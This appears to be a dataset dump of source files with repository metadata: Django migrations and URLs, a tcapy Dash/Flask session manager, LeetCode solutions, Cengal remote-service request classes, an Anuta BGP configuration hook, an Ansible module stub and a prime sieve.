blob_id
stringlengths
40
40
directory_id
stringlengths
40
40
path
stringlengths
3
616
content_id
stringlengths
40
40
detected_licenses
sequencelengths
0
112
license_type
stringclasses
2 values
repo_name
stringlengths
5
115
snapshot_id
stringlengths
40
40
revision_id
stringlengths
40
40
branch_name
stringclasses
777 values
visit_date
timestamp[us]date
2015-08-06 10:31:46
2023-09-06 10:44:38
revision_date
timestamp[us]date
1970-01-01 02:38:32
2037-05-03 13:00:00
committer_date
timestamp[us]date
1970-01-01 02:38:32
2023-09-06 01:08:06
github_id
int64
4.92k
681M
star_events_count
int64
0
209k
fork_events_count
int64
0
110k
gha_license_id
stringclasses
22 values
gha_event_created_at
timestamp[us]date
2012-06-04 01:52:49
2023-09-14 21:59:50
gha_created_at
timestamp[us]date
2008-05-22 07:58:19
2023-08-21 12:35:19
gha_language
stringclasses
149 values
src_encoding
stringclasses
26 values
language
stringclasses
1 value
is_vendor
bool
2 classes
is_generated
bool
2 classes
length_bytes
int64
3
10.2M
extension
stringclasses
188 values
content
stringlengths
3
10.2M
authors
sequencelengths
1
1
author_id
stringlengths
1
132
0eea1f221c0a6316a2eed2457dffd111f15c8a0b
16e69196886254bc0fe9d8dc919ebcfa844f326a
/edc/core/bhp_content_type_map/migrations/0005_update_module_name.py
67a886c53b822966a1fc216991741f16ccb05bd3
[]
no_license
botswana-harvard/edc
b54edc305e7f4f6b193b4498c59080a902a6aeee
4f75336ff572babd39d431185677a65bece9e524
refs/heads/master
2021-01-23T19:15:08.070350
2015-12-07T09:36:41
2015-12-07T09:36:41
35,820,838
0
0
null
null
null
null
UTF-8
Python
false
false
3,009
py
# -*- coding: utf-8 -*- import datetime from south.db import db from south.v2 import DataMigration from django.db import models class Migration(DataMigration): def forwards(self, orm): "Write your forwards methods here." # Note: Remember to use orm['appname.ModelName'] rather than "from appname.models..." ContentTypeMap = orm['bhp_content_type_map.ContentTypeMap'] for obj in ContentTypeMap.objects.all(): obj.module_name = obj.model obj.save() print (obj.app_label, obj.module_name) def backwards(self, orm): "Write your backwards methods here." pass models = { 'bhp_content_type_map.contenttypemap': { 'Meta': {'ordering': "['name']", 'unique_together': "(['app_label', 'model'],)", 'object_name': 'ContentTypeMap'}, 'app_label': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'}), 'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']", 'null': 'True', 'blank': 'True'}), 'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}), 'hostname_created': ('django.db.models.fields.CharField', [], {'default': "'mac.local'", 'max_length': '50', 'db_index': 'True', 'blank': 'True'}), 'hostname_modified': ('django.db.models.fields.CharField', [], {'default': "'mac.local'", 'max_length': '50', 'db_index': 'True', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'model': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'}), 'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}), 'module_name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50', 'db_index': 'True'}), 'user_created': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '250', 'db_index': 'True'}), 'user_modified': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '250', 'db_index': 'True'}) }, 'contenttypes.contenttype': { 'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"}, 'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}) } } complete_apps = ['bhp_content_type_map'] symmetrical = True
d7bdeb211ad293ec25a6cd5c0651169bf707cf41
efb01c5a5f00e918780009d8e870c080ece8cdc5
/tcapy/vis/sessionmanager.py
2aaa853615f7ca3d9776036187eb762a0a27eca4
[ "Apache-2.0" ]
permissive
PontusHultkrantz/tcapy
0525af2b260377a3a5479112a5a8991efc581e7d
3699c70031c95943f70a732849a1a6dac26760e9
refs/heads/master
2022-10-05T15:00:41.192500
2020-06-05T18:25:44
2020-06-05T18:25:44
269,728,925
0
0
Apache-2.0
2020-06-05T18:00:02
2020-06-05T18:00:01
null
UTF-8
Python
false
false
12,191
py
from __future__ import print_function __author__ = 'saeedamen' # Saeed Amen / [email protected] # # Copyright 2018 Cuemacro Ltd. - http//www.cuemacro.com / @cuemacro # # See the License for the specific language governing permissions and limitations under the License. # import uuid from flask import session from dash.dependencies import Output, Input, State from tcapy.conf.constants import Constants from tcapy.util.utilfunc import UtilFunc constants = Constants() class CallbackManager(object): """This class creates the appropriate Input and Output objects to wrap around dash components. It abstracts away some of the complexity of dash, by allowing the user simplify to specify the string of the dash component. It will then work out the dash type from the component name. Users need to be careful to name the dash components with the correct names. For examples, all plots, must have 'plot' within their name. """ def input_callback(self, page, input): """Create input callbacks for Dash components, which can be used to trigger callbacks. We can have multiple input callbacks for methods. Parameters ---------- page : str Name of the page (eg. 'detailed') input : str (list) Dash components where we wish to add dash based input callbacks Returns ------- dash.dependencies.Input (list) """ if not (isinstance(input, list)): input = [input] input_list = [Input(page + '-' + i.split(':')[0], self._find_type(i)) for i in input] return input_list def output_callback(self, page, output): """Create a output callback for a Dash component, which can be used to trigger callbacks. Note, that we can only have a single output callback for each method. Parameters ---------- page : str Name of the page (eg. 'detailed') output : str Dash component where we wish to add dash based output callbacks Returns ------- dash.dependencies.Output (list) """ return Output(page + '-' + output.split(':')[0], self._find_type(output)) def state_callback(self, page, state): """Create state callbacks for Dash components, which can be used to trigger callbacks. We can have multiple state callbacks for methods. Parameters ---------- page : str Name of the page (eg. 'detailed') state : str (list) Dash components where we wish to add dash based state callbacks Returns ------- dash.dependencies.State (list) """ if not (isinstance(state, list)): state= [state] state_list = [State(page + '-' + s.split(':')[0], self._find_type(s)) for s in state] return state_list def _find_type(self, tag): """Returns the dash type for a dash component. Parameters ---------- tag : str Tag for a Dash component Returns ------- str """ if ":" in tag: return tag.split(":")[1] # datepicker if 'dtpicker' in tag: return 'date' # HTML links if 'link' in tag: return 'href' # table like objects if 'table' in tag: if constants.gui_table_type == 'dash': return 'data' return 'children' # labels if 'status' in tag: return 'children' # plotly objects if 'plot' in tag and 'val' not in tag: return 'figure' # drop down values if 'val' in tag: return 'value' # HTML ordinary buttons if 'button' in tag: return 'n_clicks' # HTML upload buttons if 'upbutt' in tag: return 'contents' if 'uploadbox' in tag: return 'contents' import base64 import flask class SessionManager(object): """Manages the caching of properties for a user's session. We use this extensively, to identify users and also to store variables relating to users on the server side. It is used for example, for keeping track of which lines have plotted, user's zoom actions, whether tcapy has already plotted a particular dataset etc. """ def __init__(self): self._util_func = UtilFunc() # session ID management functions def get_session_id(self): """Gets the current user's session ID and generates a unique one if necessary. Returns ------- str """ if 'id' not in session: id = str(uuid.uuid4()) username = self.get_username() if username is not None: username = '_' + username else: username = '' session['id'] = id + username else: id = session['id'] if not isinstance(id, str): id = id.decode("utf-8") return id def get_username(self): header = flask.request.headers.get('Authorization', None) if not header: return None username_password = base64.b64decode(header.split('Basic ')[1]) username_password_utf8 = username_password.decode('utf-8') username, password = username_password_utf8.split(':') return username def set_session_flag(self, tag, value=None): """Sets a value with a specific tag in the session dictionary, which is essentially unique for every user. Parameters ---------- tag : str (dict) The "hash key" for our variable value : str What to set the value in our hash table Returns ------- """ if isinstance(tag, str): tag = [tag] if isinstance(tag, dict): for t in tag: self.set_session_flag(t, value=tag[t]) return tag = self._util_func.flatten_list_of_lists(tag) for t in tag: session[t] = value def get_session_flag(self, tag): """Gets the value of a tag in the user's session Parameters ---------- tag : str Tag to be fetched Returns ------- str """ if tag in session: if isinstance(session[tag], bool): return session[tag] return str(session[tag]) return None ##### these methods are for keeping track of which lines, user zooms have been plotted for each chart in the user's ##### session object def check_lines_plotted(self, lines_to_plot, tag): """Checks if the lines have been plotted for a particular user, by checking the plot's tag in their user session Parameters ---------- lines_to_plot : str (list) Lines to be plotted tag : str Tag of plotted lines Returns ------- bool """ if tag in session: lines_plotted = session[tag] if set(lines_to_plot) == set(lines_plotted): return True return False def check_relayoutData_plotted(self, relayoutData, tag): """Checks if the relayout data (ie. related to user's clicks, such as when they zoom in) has already been plotted. Parameters ---------- relayoutData : dict tag : str Tag referring to a particular plot Returns ------- """ if tag in session: # relayoutDataSet = None # sessionTagSet = None # # if relayoutData is not None: # relayoutDataSet = set(relayoutData) # # if session[tag] is not None: # sessionTagSet = set(session[tag]) # if relayoutData is None: # return False if relayoutData == session[tag]: return True return False def set_lines_plotted(self, lines_to_plot, tag): """Sets the lines plotted for a particular chart tag in the user's session Parameters ---------- lines_to_plot : str (list) Lines plotted tag : str Tag of the plot Returns ------- """ session[tag] = lines_to_plot def set_relayoutData_plotted(self, relayoutData, tag): """Sets the user's clicks (typically for zooming into charts) for a particular chart Parameters ---------- relayoutData : dict Details a user's click on the chart tag : str Tag referring to the plot Returns ------- """ session[tag] = relayoutData def set_username(self, username): session['username'] = username ##### We identify when a user has "clicked" a button by change in the number of clicks (Dash documentation recommends ##### this to handle user clicks) def get_session_clicks(self, tag): """Gets the number of clicks for the tag. If doesn't exist, we automatically set the tag as 0. Parameters ---------- tag : str The tag for which we want to return the number of clicks Returns ------- Number of clicks by current user """ if tag not in session: return 0 return session[tag] def set_session_clicks(self, tag, n_clicks, old_clicks=None): """Sets the number of clicks in the current user's session Parameters ---------- tag : str Tag to store the user's clicks under n_clicks : int Number of clicks to set Returns ------- """ if old_clicks is None: session[tag] = n_clicks elif old_clicks > n_clicks: session[tag] = n_clicks def check_session_tag(self, tag): """Checks if a tag exists in the user's session, and if so returns the value of that tag in the user's session Parameters ---------- tag : str Tag to check Returns ------- str or bool """ if tag in session: return session[tag] return False def exists_session_tag(self, tag): """Does a tag exist in the current user session? Parameters ---------- tag : str Returns ------- bool """ return tag in session def check_session_reset_tag(self, tag): """Checks if a tag is in session (if that tag exists already and is "True", then we reset it to "False"), otherwise return "False" Parameters ---------- tag : str Tags to check Returns ------- bool """ if tag in session: old_tag = session[tag] if old_tag: session[tag] = False return True return False return False def create_calculated_flags(self, prefix, lst=None, lst2=None): """Creates a list for a combination of prefix and list elements. Parameters ---------- prefix : str Prefix (typically a page name like 'detailed') lst : str (list) Tags will contain these lst2 : str (list) Tags will contain these Returns ------- str (list) """ if isinstance(prefix, list): prefix = self._util_func.flatten_list_of_lists(prefix) lst = [x + '-' + lst for x in prefix] elif isinstance(lst, list): lst = self._util_func.flatten_list_of_lists(lst) lst = [prefix + '-' + x for x in lst] if lst2 is None: return lst lst3 = [] for i in lst2: for j in lst: lst3.append(j + '-' + i) return lst3
4404bba47db646d9416036a3aa8e535334e7902f
d554b1aa8b70fddf81da8988b4aaa43788fede88
/5 - Notebooks e Data/1 - Análises numéricas/Arquivos David/Atualizados/logDicas-master/data/2019-1/222/users/4060/codes/1684_1100.py
47661cdbda903bedb36e8d7ab2f89e70b5985e55
[]
no_license
JosephLevinthal/Research-projects
a3bc3ca3b09faad16f5cce5949a2279cf14742ba
60d5fd6eb864a5181f4321e7a992812f3c2139f9
refs/heads/master
2022-07-31T06:43:02.686109
2020-05-23T00:24:26
2020-05-23T00:24:26
266,199,309
1
0
null
null
null
null
UTF-8
Python
false
false
541
py
# Teste seu código aos poucos. # Não teste tudo no final, pois fica mais difícil de identificar erros. # Ao testar sua solução, não se limite ao caso de exemplo. a=int(input("Entrada: ")) print("Entrada:",a) if((a!=2)and(a!=5)and(a!=10)and(a!=20)and(a!=50)and(a!=100)): print("Animal: Invalido") elif(a==2): print("Animal: Tartarura") elif(a==5): print("Animal: Garca") elif(a==10): print("Animal: Arara") elif(a==20): print("Animal: Mico-leao-dourado") elif(a==50): print("Animal: Onca-pintada") else: print("Animal: Garoupa")
fc1fa4990f3eb7c426991f2e920afe5ac67e8b2a
150d9e4cee92be00251625b7f9ff231cc8306e9f
/ReverseWordsIII.py
35bceae2ed4be0c631984cf4c703decb182946b7
[]
no_license
JerinPaulS/Python-Programs
0d3724ce277794be597104d9e8f8becb67282cb0
d0778178d89d39a93ddb9b95ca18706554eb7655
refs/heads/master
2022-05-12T02:18:12.599648
2022-04-20T18:02:15
2022-04-20T18:02:15
216,547,245
0
0
null
null
null
null
UTF-8
Python
false
false
1,277
py
''' 557. Reverse Words in a String III Given a string s, reverse the order of characters in each word within a sentence while still preserving whitespace and initial word order. Example 1: Input: s = "Let's take LeetCode contest" Output: "s'teL ekat edoCteeL tsetnoc" Example 2: Input: s = "God Ding" Output: "doG gniD" Constraints: 1 <= s.length <= 5 * 104 s contains printable ASCII characters. s does not contain any leading or trailing spaces. There is at least one word in s. All the words in s are separated by a single space. ''' class Solution(object): def reverseWords(self, s): """ :type s: str :rtype: str """ word_list = s.split() word_list_list = [] result = "" for word in word_list: temp = list(word) word_list_list.append(temp) for word in word_list_list: start = 0 end = len(word) - 1 while start <= end: temp = word[start] word[start] = word[end] word[end] = temp start = start + 1 end = end - 1 for word in word_list_list: result = result + ''.join(word) + " " return result[:-1] obj = Solution() print(obj.reverseWords("Let's take LeetCode contest"))
87dc46c97d4047d73908836fa9cea55aafcbdcd3
24fac945c7825c502f9fb2e6df06db26b80b5676
/blogdjangogirls/urls.py
230fe7f82e3aea6d486403578d1fc5bd5bdbd700
[]
no_license
mario220696/my-first-blog
8f0a9883c4ecde58a8c3483e5ad0823b81a4db7c
72ec03a579965c984a770f0c4cca0a3eca28aa46
refs/heads/master
2020-03-17T11:48:03.954834
2018-05-15T19:28:36
2018-05-15T19:28:36
133,564,112
0
0
null
null
null
null
UTF-8
Python
false
false
757
py
"""blogdjangogirls URL Configuration The `urlpatterns` list routes URLs to views. For more information please see: https://docs.djangoproject.com/en/2.0/topics/http/urls/ Examples: Function views 1. Add an import: from my_app import views 2. Add a URL to urlpatterns: path('', views.home, name='home') Class-based views 1. Add an import: from other_app.views import Home 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home') Including another URLconf 1. Import the include() function: from django.urls import include, path 2. Add a URL to urlpatterns: path('blog/', include('blog.urls')) """ from django.contrib import admin from django.urls import path urlpatterns = [ path('admin/', admin.site.urls), ]
5972e9b3b763273f9a652d66f3d080b66c693961
6dedbcff0af848aa979574426ad9fa3936be5c4a
/cengal/parallel_execution/coroutines/coro_standard_services/remote_nodes/versions/v_0/request_class_info.py
fb2ff414d2289c06f43f46ac97d35a61e59d0cfe
[ "Apache-2.0" ]
permissive
FI-Mihej/Cengal
558d13541865e22006431bd1a1410ad57261484a
d36c05f4c90dfdac7296e87cf682df2f4d367e4b
refs/heads/master
2023-06-08T00:39:39.414352
2023-06-05T21:35:50
2023-06-05T21:35:50
68,829,562
10
1
null
null
null
null
UTF-8
Python
false
false
6,043
py
#!/usr/bin/env python # coding=utf-8 # Copyright © 2012-2023 ButenkoMS. All rights reserved. Contacts: <[email protected]> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Module Docstring Docstrings: http://www.python.org/dev/peps/pep-0257/ """ __author__ = "ButenkoMS <[email protected]>" __copyright__ = "Copyright © 2012-2023 ButenkoMS. All rights reserved. Contacts: <[email protected]>" __credits__ = ["ButenkoMS <[email protected]>", ] __license__ = "Apache License, Version 2.0" __version__ = "3.2.6" __maintainer__ = "ButenkoMS <[email protected]>" __email__ = "[email protected]" # __status__ = "Prototype" __status__ = "Development" # __status__ = "Production" from enum import Enum from cengal.parallel_execution.coroutines.coro_scheduler import * from cengal.parallel_execution.coroutines.coro_tools.await_coro import * from cengal.parallel_execution.coroutines.coro_standard_services.asyncio_loop import * from cengal.parallel_execution.coroutines.coro_standard_services.loop_yield import CoroPriority from cengal.parallel_execution.coroutines.coro_standard_services.put_coro import * from cengal.parallel_execution.coroutines.coro_standard_services.timer_func_runner import * from cengal.file_system.file_manager import path_relative_to_current_dir from cengal.time_management.load_best_timer import perf_counter from cengal.data_manipulation.serialization import * from typing import Hashable, Tuple, List, Any, Dict, Callable, Type from cengal.introspection.inspect import get_exception, entity_owning_module_importable_str, entity_owning_module_info_and_owning_path, entity_properties from cengal.io.core.memory_management import IOCoreMemoryManagement from cengal.parallel_execution.asyncio.efficient_streams import StreamManagerIOCoreMemoryManagement, TcpStreamManager, UdpStreamManager, StreamManagerAbstract from cengal.code_flow_control.smart_values import ValueExistence from cengal.io.named_connections.named_connections_manager import NamedConnectionsManager from cengal.code_flow_control.args_manager import number_of_provided_args from cengal.data_manipulation.serialization import Serializer, Serializers, best_serializer from cengal.code_flow_control.args_manager import find_arg_position_and_value, UnknownArgumentError from cengal.data_generation.id_generator import IDGenerator, GeneratorType from cengal.system import PLATFORM_NAME, PYTHON_VERSION from importlib import import_module import sys import os import asyncio import lmdb from .exceptions import * from .commands import * from .class_info import * class LocalRequestClassInfo(LocalClassInfo): def __init__(self, local_id: Hashable, request: Request) -> None: super().__init__(local_id, type(request)) self._properties: Dict[str, Hashable] = {property_name: index for index, property_name in enumerate(entity_properties(request))} # key: property name; value: property id self._properties_tuple: Tuple[Tuple[str, Hashable]] = tuple(self._properties.items()) def __call__(self) -> Type: return { CommandDataFieldsDeclareServiceRequestClass.local_id.value: self._local_id, CommandDataFieldsDeclareServiceRequestClass.class_name.value: self._class_name, CommandDataFieldsDeclareServiceRequestClass.module_importable_str.value: self._module_importable_str, CommandDataFieldsDeclareServiceRequestClass.properties_tuple.value: self._properties_tuple, } @property def properties(self): return self._properties @property def properties_tuple(self): return self._properties_tuple def request_to_data(self, request: Request) -> Dict: return { CommandDataFieldsServiceRequestWithRequestClass.request_class_id.value: self._local_id, CommandDataFieldsServiceRequestWithRequestClass.properties_tuple.value: tuple(((property_id, getattr(request, property_name)) for property_name, property_id in self._properties_tuple)), } class RemoteRequestClassInfo(RemoteClassInfo): def __init__(self, local_id: Hashable, class_name: str, module_importable_str: str, properties_tuple: Tuple[Tuple[str, Hashable]]) -> None: super().__init__(local_id, class_name, module_importable_str) self._properties_tuple: Tuple[Tuple[str, Hashable]] = properties_tuple self._properties: Dict[Hashable, str] = {index: property_name for property_name, index in properties_tuple} # key: property id; value: property name @classmethod def from_data(cls, data: Dict[Hashable, Any]) -> 'RemoteRequestClassInfo': local_id: Hashable = data[CommandDataFieldsDeclareServiceRequestClass.local_id.value] class_name: str = data[CommandDataFieldsDeclareServiceRequestClass.class_name.value] module_importable_str: str = data[CommandDataFieldsDeclareServiceRequestClass.module_importable_str.value] properties_tuple: Tuple[Tuple[str, Hashable]] = data[CommandDataFieldsDeclareServiceRequestClass.properties_tuple.value] return cls(local_id, class_name, module_importable_str, properties_tuple) def __call__(self, data: Dict) -> Request: request: Request = self.class_type() properties_tuple: Tuple[Tuple[Hashable, Any]] = data[CommandDataFieldsDeclareServiceRequestClass.properties_tuple.value] for index, value in properties_tuple: name: str = self._properties[index] setattr(request, name, value) return request
c7be3da8472cb8def0f76e0cac71b79a7063ba14
c829275111b9025dcccc9ac1b92d8dc51adbb71d
/photo/urls.py
4fec7ab88e9eb5f629a088b997138a2b641ed5cb
[ "MIT" ]
permissive
Ken-mbira/PHOTO_BOOK
f1bd1bd65af228b0600bf69da12840897eb109ad
d47cd8dabd4b92e3befdafe2d99db266be31ffff
refs/heads/master
2023-08-19T06:55:07.309342
2021-10-12T11:05:00
2021-10-12T11:05:00
414,297,623
0
0
null
null
null
null
UTF-8
Python
false
false
521
py
from django.urls import path from django.conf import settings from django.conf.urls.static import static from . import views urlpatterns = [ path('',views.index,name = 'home'), path('images/',views.images,name = 'images'), path('images/<int:pk>',views.image_spec,name = 'image'), path('category/<int:pk>',views.image_category,name = 'category'), path('search',views.search_images, name="search") ] if settings.DEBUG: urlpatterns+= static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT)
20cf30291dd3e1ce42e9eac92e98cb83666fbc14
303bac96502e5b1666c05afd6c2e85cf33f19d8c
/solutions/python3/946.py
08e5a7f4e305aa8dfddd5a773566d9bdd70744e5
[ "MIT" ]
permissive
jxhangithub/leetcode
5e82f4aeee1bf201e93e889e5c4ded2fcda90437
0de1af607557d95856f0e4c2a12a56c8c57d731d
refs/heads/master
2022-05-22T12:57:54.251281
2022-03-09T22:36:20
2022-03-09T22:36:20
370,508,127
1
0
MIT
2022-03-09T22:36:20
2021-05-24T23:16:10
null
UTF-8
Python
false
false
392
py
class Solution: def validateStackSequences(self, pushed, popped): """ :type pushed: List[int] :type popped: List[int] :rtype: bool """ arr, i = [], 0 for num in pushed: arr.append(num) while arr and arr[-1] == popped[i]: i += 1 arr.pop() return arr == popped[i:][::-1]
f2a2c09d102ebb4c12b5678990d4b07e6fa71280
16eaa90eec58137c7cf0e429e574499d00ee21f2
/apps/manga/models/manga.py
325ffa9c350f2a247de6aad14b844a1d38c33887
[ "MIT" ]
permissive
eliezer-borde-globant/lemanga
53c48f91f5df4671c1653ab927acab3c95097468
57c799804754f6a91fd214faac84d9cd017fc0c4
refs/heads/master
2023-02-16T23:25:49.889702
2020-12-28T17:27:49
2020-12-28T17:27:49
322,420,102
0
0
MIT
2020-12-17T23:10:32
2020-12-17T21:43:56
null
UTF-8
Python
false
false
748
py
from __future__ import unicode_literals import uuid from django.core.urlresolvers import reverse_lazy from django.db import models from django.utils.encoding import python_2_unicode_compatible from autoslug import AutoSlugField @python_2_unicode_compatible class Manga(models.Model): id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False) name = models.CharField(max_length=200, unique=True) slug = AutoSlugField(populate_from='name', unique=True, always_update=True) class Meta: verbose_name = "Manga" verbose_name_plural = "Mangas" def __str__(self): return self.name def get_absolute_url(self): return reverse_lazy('detail-manga', kwargs={"name": self.slug})
528f4f027317f1d22c63b7a145d3182c87daa77f
86fc644c327a8d6ea66fd045d94c7733c22df48c
/scripts/managed_cpe_services/customer/single_cpe_dual_wan_site/single_cpe_dual_wan_site_services/cpe_primary_wan/end_points/bgp_peers/service_customization.py
7e389e7294aa0bde9644faa5fec5bf5a73b91948
[]
no_license
lucabrasi83/anutacpedeployment
bfe703657fbcf0375c92bcbe7560051817f1a526
96de3a4fd4adbbc0d443620f0c53f397823a1cad
refs/heads/master
2021-09-24T16:44:05.305313
2018-10-12T02:41:18
2018-10-12T02:41:18
95,190,459
0
0
null
null
null
null
UTF-8
Python
false
false
5,162
py
# # This computer program is the confidential information and proprietary trade # secret of Anuta Networks, Inc. Possessions and use of this program must # conform strictly to the license agreement between the user and # Anuta Networks, Inc., and receipt or possession does not convey any rights # to divulge, reproduce, or allow others to use this program without specific # written authorization of Anuta Networks, Inc. # # Copyright (c) 2015-2016 Anuta Networks, Inc. All Rights Reserved. # # #ALL THE CUSTOMIZATIONS REGARDING DATAPROCESSING SHOULD BE WRITTEN INTO THIS FILE # """ Tree Structure of Handled XPATH: services | managed-cpe-services | customer | single-cpe-dual-wan-site | single-cpe-dual-wan-site-services | cpe-primary-wan | end-points | bgp-peers Schema Representation: /services/managed-cpe-services/customer/single-cpe-dual-wan-site/single-cpe-dual-wan-site-services/cpe-primary-wan/end-points/bgp-peers """ """ Names of Leafs for this Yang Entity BGP-peer-name peer-ip peer-description remote-as password import-route-map export-route-map next-hop-self soft-reconfiguration default-originate default-originate-route-map send-community encrypted-password advertisement-interval time-in-sec timers keepalive-interval holdtime """ from servicemodel import util from servicemodel import yang from servicemodel import devicemgr from cpedeployment.cpedeployment_lib import getLocalObject from cpedeployment.cpedeployment_lib import getDeviceObject from cpedeployment.cpedeployment_lib import getCurrentObjectConfig from cpedeployment.cpedeployment_lib import ServiceModelContext from cpedeployment.cpedeployment_lib import getParentObject from cpedeployment.cpedeployment_lib import log from cpedeployment.bgppeer_lib import bgp_peer from cpedeployment.bgppeer_lib import update_bgp_peer class ServiceDataCustomization: @staticmethod def process_service_create_data(smodelctx, sdata, dev, **kwargs): """ Custom API to modify the inputs""" modify = True if modify and kwargs is not None: for key, value in kwargs.iteritems(): log("%s == %s" %(key,value)) if modify: config = kwargs['config'] inputdict = kwargs['inputdict'] @staticmethod def process_service_device_bindings(smodelctx, sdata, dev, **kwargs): """ Custom API to modify the device bindings or Call the Business Login Handlers""" modify = True if modify and kwargs is not None: for key, value in kwargs.iteritems(): log("%s == %s" %(key,value)) if modify: config = kwargs['config'] inputdict = kwargs['inputdict'] devbindobjs = kwargs['devbindobjs'] for device in util.convert_to_list(dev): bgp_peer('cpe_dual', 'cpe_primary_dual', smodelctx, sdata, device, **kwargs) @staticmethod def process_service_update_data(smodelctx, sdata, **kwargs): """callback called for update operation""" modify = True if modify and kwargs is not None: for key, value in kwargs.iteritems(): log("%s == %s" %(key,value)) dev = kwargs['dev'] for device in util.convert_to_list(dev): update_bgp_peer('cpe_dual', 'cpe_primary_dual', smodelctx, sdata, device, **kwargs) @staticmethod def process_service_delete_data(smodelctx, sdata, **kwargs): """callback called for delete operation""" modify = False if modify and kwargs is not None: for key, value in kwargs.iteritems(): log("%s == %s" %(key,value)) class DeletePreProcessor(yang.SessionPreProcessor): def processBeforeReserve(self, session): operations = session.getOperations() """Add any move operations for Deletion""" log('operations: %s' % (operations)) class CreatePreProcessor(yang.SessionPreProcessor): def processBeforeReserve(self, session): operations = session.getOperations() """Add any move operations for creation""" log('operations: %s' % (operations))
33342edc351835d96fc30b2229c64f36d1195aa5
0e25538b2f24f1bc002b19a61391017c17667d3d
/storefront/win_sfstore.py
182c135f774ac6bf02adb5b401eac608aa296006
[]
no_license
trondhindenes/Ansible-Auto-Generated-Modules
725fae6ba9b0eef00c9fdc21179e2500dfd6725f
efa6ac8cd2b545116f24c1929936eb8cc5c8d337
refs/heads/master
2020-04-06T09:21:00.756651
2016-10-07T07:08:29
2016-10-07T07:08:29
36,883,816
12
2
null
null
null
null
UTF-8
Python
false
false
2,533
py
#!/usr/bin/python # -*- coding: utf-8 -*- # <COPYRIGHT> # <CODEGENMETA> # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. # this is a windows documentation stub. actual code lives in the .ps1 # file of the same name DOCUMENTATION = ''' --- module: win_sfstore version_added: short_description: Generated from DSC module storefront version 0.9.4 at 07.10.2016 01.23.53 description: - The Storefront DSC resources can automate the deployment and configuration of Citrix Storefront 3.5. These DSC resources are provided AS IS, and are not supported through any means. options: AuthenticationServiceVirtualPath: description: - required: True default: aliases: [] VirtualPath: description: - required: True default: aliases: [] Ensure: description: - required: False default: aliases: [] choices: - Absent - Present FriendlyName: description: - required: False default: aliases: [] PsDscRunAsCredential_username: description: - required: False default: aliases: [] PsDscRunAsCredential_password: description: - required: False default: aliases: [] SiteId: description: - required: False default: aliases: [] AutoInstallModule: description: - If true, the required dsc resource/module will be auto-installed using the Powershell package manager required: False default: false aliases: [] choices: - true - false AutoConfigureLcm: description: - If true, LCM will be auto-configured for directly invoking DSC resources (which is a one-time requirement for Ansible DSC modules) required: False default: false aliases: [] choices: - true - false
abf55a6e89c418a0d6cb8142f1025f77d7a05d97
3879d1ca43c573c209f962182cd1e7f7fe978fbf
/binarysearch/Generate-Primes/Generate-Primes.py
732a67fc393a9520ae82b86615fcb9d57bfa042b
[]
no_license
DoctorLai/ACM
34a5600a5adf22660c5d81b2d8b7a358be537ecf
aefa170f74c55c1230eb6f352770512b1e3f469e
refs/heads/master
2023-09-01T02:13:01.604508
2023-08-31T15:42:07
2023-08-31T15:42:07
146,173,024
62
18
null
2020-10-11T13:19:57
2018-08-26T11:00:36
C++
UTF-8
Python
false
false
538
py
# https://helloacm.com/teaching-kids-programmaing-generate-prime-numbers-using-sieve-of-eratosthenes-algorithms/ # https://binarysearch.com/problems/Generate-Primes # EASY, MATH class Solution: def solve(self, n): isPrimes = [False] * 2 + [True] * (n - 1) i = 2 while i * i <= n: if isPrimes[i]: j = i + i while j <= n: isPrimes[j] = False j += i i += 1 return [x for x in range(1, n + 1) if isPrimes[x]]
7e9bc8c8ada0baa06ab47fa561af1ba9a1656353
4e96f383d4703ad8ee58869ed91a0c8432c8a051
/Cura/Uranium/UM/Scene/GroupDecorator.py
683f4d0b12d57e068187742b233f7f8283baa708
[ "GPL-3.0-only", "LGPL-3.0-only" ]
permissive
flight7788/3d-printing-with-moveo-1
b2dba26010c4fa31815bc1d2d0966161a8600081
7fcb9c6b5da9245d54ac917de8c2a7f5148e42b0
refs/heads/Feature_Marlin_with_AlanBoy
2022-08-30T18:36:44.785058
2020-05-30T07:52:58
2020-05-30T07:52:58
212,583,912
0
0
MIT
2020-05-16T07:39:47
2019-10-03T13:13:01
C
UTF-8
Python
false
false
1,777
py
